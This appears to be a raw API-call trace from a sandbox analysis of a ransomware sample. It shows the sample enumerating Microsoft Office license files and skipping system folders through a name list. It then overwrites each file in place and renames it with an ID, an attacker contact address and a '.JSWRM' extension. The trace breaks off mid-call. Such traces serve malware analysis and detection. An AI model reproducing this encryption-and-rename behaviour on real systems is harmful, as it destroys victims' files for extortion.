1 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0104.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0104.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0104.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0104.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0104.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0104.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0104.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0104.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0104.311] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe55c47dc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe55c47dc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe568339c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5780, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_Grace-ppd.xrm-ms", cAlternateFileName="O374C4~1.XRM")) returned 1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.311] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.312] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.312] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.312] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.312] lstrcmpiW (lpString1="O365BusinessR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0104.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.313] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22400) returned 1 [0104.313] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5780) returned 0x24c1d0 [0104.313] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5780, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5780, lpOverlapped=0x0) returned 1 [0104.335] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.335] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5780, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5780, lpOverlapped=0x0) returned 1 [0104.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.335] CloseHandle (hObject=0x45c) returned 1 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0104.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0104.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.336] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0104.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0104.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0104.337] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe55eaa21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe55eaa21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe56cf7ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_Grace-ul-oob.xrm-ms", cAlternateFileName="O346D5~1.XRM")) returned 1 [0104.337] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.338] lstrcmpiW (lpString1="O365BusinessR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.339] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0104.339] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.339] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.341] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.341] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.341] CloseHandle (hObject=0x45c) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0104.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0104.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0104.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0104.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.342] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.343] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5578312, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5578312, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe56f5a42, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_Subscription-pl.xrm-ms", cAlternateFileName="O365BU~4.XRM")) returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.343] lstrcmpiW (lpString1="O365BusinessR_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0104.344] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.344] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0104.344] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.344] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, 